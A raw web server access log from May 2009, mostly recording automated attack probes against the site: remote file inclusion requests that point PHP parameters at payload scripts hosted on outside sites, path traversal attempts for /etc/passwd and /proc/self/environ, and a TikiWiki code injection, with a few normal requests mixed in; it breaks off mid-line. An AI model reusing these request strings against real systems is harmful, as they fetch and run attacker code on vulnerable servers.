77.221.130.12 - - [13/May/2009:07:09:58 -0400] "GET /logs/access_log.Q108063000/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
77.221.130.12 - - [13/May/2009:07:09:58 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
203.22.204.90 - - [13/May/2009:07:09:58 -0400] "GET /logs/access_log.Q108100800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.76"
172.16.1.157 - - [13/May/2009:07:09:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:09:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:09:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
148.243.72.112 - - [13/May/2009:07:09:59 -0400] "GET /logs/access_log.Q108100100/index3.php?a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:07:09:59 -0400] "GET /index3.php?a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:07:09:59 -0400] "GET /logs/index3.php?a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
148.243.72.112 - - [13/May/2009:07:09:59 -0400] "GET /logs/access_log.Q108090400/index3.php?a=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
74.55.156.2 - - [13/May/2009:07:10:01 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:07:10:01 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:07:10:01 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.820"
201.234.41.5 - - [13/May/2009:07:10:02 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
74.55.156.2 - - [13/May/2009:07:10:02 -0400] "GET /logs/access_log.Q108100800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.820"
201.234.41.5 - - [13/May/2009:07:10:02 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:07:10:02 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:07:10:04 -0400] "GET /logs/access_log.Q108100800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
85.18.117.101 - - [13/May/2009:07:10:30 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:07:10:30 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.76.47.224 - - [13/May/2009:07:10:33 -0400] "GET /logs/access_log.Q108070200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:07:10:33 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:07:10:33 -0400] "GET /logs/access_log.Q108063000/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:07:10:33 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:10:33 -0400] "GET /logs/access_log.Q108090400/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:10:33 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:10:40 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.202.42.17 - - [13/May/2009:07:10:57 -0400] "GET /logs/access_log.Q108121000 HTTP/1.1" 404 224 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
155.212.232.66 - - [13/May/2009:07:11:06 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:11:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:11:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:11:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
121.165.73.157 - - [13/May/2009:07:11:09 -0400] "GET /logs/access_log.Q108090400/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:11:10 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:11:17 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.227.156.113 - - [13/May/2009:07:11:22 -0400] "GET /logs/error_log.Q108061400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 291 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
211.115.89.68 - - [13/May/2009:07:11:41 -0400] "GET /logs//auth.php?path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.115.89.68 - - [13/May/2009:07:11:41 -0400] "GET /logs/access_log.Q109020500//auth.php?path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.89.68 - - [13/May/2009:07:11:41 -0400] "GET //auth.php?path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:07:11:42 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:07:11:42 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:07:11:42 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:07:11:42 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:07:11:42 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:11:42 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:11:49 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:07:11:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:11:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:11:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
202.89.33.167 - - [13/May/2009:07:12:05 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:05 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:05 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:14 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:38 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:38 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:12:39 -0400] "GET /logs/access_log.Q109022600%20%20//BaseAdmin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:13:04 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:13:04 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.12 - - [13/May/2009:07:13:11 -0400] "GET /logs/access_log.Q108052200%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:07:13:23 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:13:23 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:13:24 -0400] "GET /?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:13:24 -0400] "GET /?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:13:40 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.19 - - [13/May/2009:07:13:42 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
202.89.33.167 - - [13/May/2009:07:13:55 -0400] "GET /logs/access_log.Q108122100%20%20//BaseAdmin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:07:14:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:14:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:14:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.147.29.190 - - [13/May/2009:07:14:08 -0400] "GET /logs/access_log.Q108092600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.76.47.224 - - [13/May/2009:07:14:24 -0400] "GET /logs/access_log.Q108052200%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:07:14:30 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:07:14:30 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.820"
148.243.72.112 - - [13/May/2009:07:14:33 -0400] "GET /senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
148.243.72.112 - - [13/May/2009:07:14:33 -0400] "GET /logs/access_log.Q108061400%20%20/senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
148.243.72.112 - - [13/May/2009:07:14:33 -0400] "GET /logs/senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
148.243.72.112 - - [13/May/2009:07:14:37 -0400] "GET /logs/access_log.Q109050700%20%20/senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:00 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:00 -0400] "GET /logs/access_log.Q108112400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:07:15:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:15:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:15:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
148.243.72.112 - - [13/May/2009:07:15:18 -0400] "GET /logs/access_log.Q108061400/senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:19 -0400] "GET /logs/access_log.Q108093000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
148.243.72.112 - - [13/May/2009:07:15:23 -0400] "GET /logs/access_log.Q109050700/senetman/html/index.php?page=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:15:23 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:40 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:40 -0400] "GET /logs/access_log.Q108112400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:15:43 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:15:59 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:15:59 -0400] "GET /logs/access_log.Q108111600/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.22.204.90 - - [13/May/2009:07:15:59 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.76"
203.22.204.90 - - [13/May/2009:07:16:00 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
217.18.76.16 - - [13/May/2009:07:16:04 -0400] "GET /logs/access_log.Q108081200/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:28 -0400] "GET /logs/access_log.Q108111500//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:28 -0400] "GET /logs/access_log.Q108111500//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:28 -0400] "GET /logs/access_log.Q108111500//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
222.231.24.38 - - [13/May/2009:07:16:29 -0400] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
217.147.29.190 - - [13/May/2009:07:16:30 -0400] "GET /logs/access_log.Q108093000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:17:01 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:17:01 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:17:01 -0400] "GET /logs/access_log.Q108111600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:07:17:29 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:07:17:29 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
121.101.159.29 - - [13/May/2009:07:18:13 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.101.159.29 - - [13/May/2009:07:18:14 -0400] "GET /logs/access_log.Q108122800//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.101.159.29 - - [13/May/2009:07:18:14 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.101.159.29 - - [13/May/2009:07:18:14 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
121.101.159.29 - - [13/May/2009:07:18:15 -0400] "GET /logs/access_log.Q108122800//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
121.101.159.29 - - [13/May/2009:07:18:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
121.101.159.29 - - [13/May/2009:07:18:27 -0400] "GET /logs/access_log.Q109022200//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.101.159.29 - - [13/May/2009:07:18:28 -0400] "GET /logs/access_log.Q109022200//modules/xfsection/modify.php?dir_module=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.147.29.190 - - [13/May/2009:07:18:36 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:18:46 -0400] "GET /logs/access_log.Q108093000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:18:50 -0400] "GET /convert/m